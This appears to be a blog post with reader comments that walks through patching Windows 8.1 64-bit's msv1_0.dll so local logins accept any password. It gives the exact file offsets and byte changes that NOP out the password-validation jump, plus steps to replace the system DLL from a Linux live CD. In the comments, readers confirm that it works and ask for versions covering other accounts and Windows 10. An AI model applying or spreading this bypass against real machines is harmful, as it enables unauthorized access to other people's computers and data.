Windows 8.1 64bit msv1_0.dll patch update

window

Recently Microsoft has issued a Consumer Preview  for public download of Windows 8.1. I have gone through the msv1_0.dll file to look for the msvppasswordvalidate function in the dll and patch the corresponding section with a bypass code. There are slight changes from previous release of course which is described below. Still searching for a reliable way to do this via Metasploit meterpreter screen_unlock.rb script for 64bit platform (no problem for 32bit) But like in the previous example, a local patch of msv1_0.dll is required for this demo.

Win8.1.01Mysterious function that we are interested in is SUB_18000588Cmsvppasswordvalidate

Again a quick view in HEX the equivalent of  JNZ  LOC_1800432C0  is

0F 85 EB 26 02 00

Win8.1.02Patching this value by 90 90 90 90 90 90 we successfully bypass any local authentication via msv1_0.dll in Windows 8.1 (any password you type will do etc…)

Here is the patch diff:

msv1_0.dll
0001FFCF: 0F 90
0001FFD0: 85 90
0001FFD1: EB 90
0001FFD2: 26 90
0001FFD3: 02 90
0001FFD4: 00 90

Patch the original dll using ida_patcher.exe and replace the msv1_0.dll in C:\Windows\System32\msv1_0.dll with the patched dll. I have used a Linux live CD with ntfs-3g drivers to do this for the demo.

 

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

7 Responses to Windows 8.1 64bit msv1_0.dll patch update

  1. x4r0r says:

    TEST EN WINDOWS 7?

  2. Eric says:

    It works great! Could you find out a way to bypass the authentication for Windows 8 Microsoft account? Thanks!

    • astr0baby says:

      Hi,
      thanks for commenting, it actually works the same on windows 8.x too, but you need to use a local machine account, not the default offered Microsoft account when setting up widows 8.x. The trick is patching the msv1.0.dll which is used only for local machine accounts. Try and configure Windows 8.x using non Microsoft account (use only local account) and the msv1.0.dll patch will work….

  3. Steve says:

    there does not seem to be a msvppasswordvalidate in the Windows 10 version. Any idea of where to look for a patch for Win 10?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s